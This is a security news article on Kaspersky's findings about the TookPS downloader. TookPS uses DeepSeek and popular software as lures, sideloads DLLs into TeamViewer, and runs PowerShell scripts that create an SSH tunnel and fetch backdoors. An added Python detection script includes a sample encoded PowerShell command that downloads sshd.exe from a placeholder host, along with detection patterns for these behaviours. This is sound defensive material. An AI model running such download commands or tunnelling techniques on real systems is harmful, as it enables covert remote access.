New research from Kaspersky reveals that threat actors are using the DeepSeek LLM as bait in multiple malicious campaigns. Initially discovered in early March, the TookPS downloader, identified as a key malware strain, has now been found mimicking neural networks and 3D modeling tools.
Targets

Potential victims of this campaign include both individual users and organizations that use AutoCAD, UltraViewer, and SketchUp. The attackers also targeted music production and personal finance software, including Ableton and Quicken, widening the potential victim pool.
The malware also deploys modified legitimate applications, such as TeamViewer, through DLL sideloading, allowing attackers to maintain persistent, covert access for a longer period. The technique places a malicious library alongside TeamViewer, changing the application's behavior without the user's knowledge.
Technical Details
When TookPS infiltrates a system, it contacts a command-and-control (C2) server whose domain is hardcoded into the malware. Once connected, it receives a base64-encoded command that triggers the download and execution of three PowerShell scripts:
- First script: Downloads sshd.exe, its configuration file, and an RSA key from the C2 server.
- Second script: Retrieves command-line parameters and runs the SSH server, creating a tunnel between the compromised device and the remote server.
- Third script: Attempts to download modified versions of two backdoors, Backdoor.Win32.TeviRat and Backdoor.Win32.Lapmon.
Different samples of TookPS communicate with different C2 domains. For example, a sample with the MD5 hash 2AEF18C97265D00358D6A778B9470960 contacted bsrecov4[.]digital, but the domain was inactive during Kaspersky’s analysis.
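As an added defender-side illustration (not code from Kaspersky's report), the following Python checks constructed endpoint events for the three behaviours described above: an encoded PowerShell command that references sshd, sshd.exe launched from outside the Windows OpenSSH directory, and TeamViewer.exe loading a DLL from an untrusted location. The OpenSSH and TeamViewer install paths, the placeholder host name, and all sample events are assumptions.

```python
import base64
from pathlib import PureWindowsPath

# Assumed path of the Windows-bundled OpenSSH server; sshd.exe anywhere else is suspect.
OPENSSH_DIR = PureWindowsPath(r"C:\Windows\System32\OpenSSH")
# Assumed directories a legitimately installed TeamViewer may load DLLs from.
TRUSTED_DLL_DIRS = (PureWindowsPath(r"C:\Program Files\TeamViewer"), PureWindowsPath(r"C:\Windows\System32"))
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

def enc(ps: str) -> str:
    """Base64-encode a PowerShell string the way -EncodedCommand expects (UTF-16LE)."""
    return base64.b64encode(ps.encode("utf-16le")).decode()

# Constructed sample telemetry (not real logs), shaped like Sysmon process-create and
# image-load records; the host name and file paths are placeholders.
EVENTS = [
    {"type": "process_create", "image": PS,
     "cmdline": "powershell.exe -enc " + enc(r"iwr http://c2.invalid/s -OutFile C:\Users\Public\sshd.exe")},
    {"type": "process_create", "image": r"C:\Users\Public\sshd.exe", "cmdline": "sshd.exe -f sshd_config"},
    {"type": "image_load", "image": r"C:\Users\Public\TV\TeamViewer.exe", "dll": r"C:\Users\Public\TV\sideloaded.dll"},
    {"type": "process_create", "image": r"C:\Windows\System32\OpenSSH\sshd.exe", "cmdline": "sshd.exe"},
    {"type": "process_create", "image": PS, "cmdline": "powershell.exe -EncodedCommand " + enc("Get-Date")},
]

def decode_encoded_command(cmdline: str):
    """Return the decoded -enc/-EncodedCommand payload, or None if absent or malformed."""
    parts = cmdline.split()
    for i, p in enumerate(parts[:-1]):
        if p.lower().lstrip("-/") in ("e", "ec", "enc", "encodedcommand"):
            try:
                return base64.b64decode(parts[i + 1]).decode("utf-16le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None

def inspect_event(ev: dict) -> list:
    """Return the labels of every TookPS-style indicator matched by one event."""
    hits, image = [], PureWindowsPath(ev["image"])
    name = image.name.lower()
    if ev["type"] == "process_create":
        decoded = decode_encoded_command(ev.get("cmdline", "")) if name == "powershell.exe" else None
        if decoded and "sshd" in decoded.lower():
            hits.append("encoded PowerShell command referencing sshd")
        if name == "sshd.exe" and image.parent != OPENSSH_DIR:
            hits.append("sshd.exe started outside the OpenSSH directory")
    elif ev["type"] == "image_load":
        if name == "teamviewer.exe" and PureWindowsPath(ev["dll"]).parent not in TRUSTED_DLL_DIRS:
            hits.append("TeamViewer loaded a DLL from an untrusted directory")
    return hits
```

Running `inspect_event` over `EVENTS` flags the first three records and leaves the two benign ones (sshd.exe from its normal directory, an encoded `Get-Date`) untouched.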
The Bottom Line
Experts suggest that the DeepSeek lure is part of a larger campaign targeting both home users and businesses. Users are advised to avoid downloading software from suspicious or pirated sources. Organizations should implement stringent security policies that restrict downloads from unverified websites and conduct regular security-related training to improve employee awareness.
Source: hxxps[://]securelist[.]com/tookps/116019/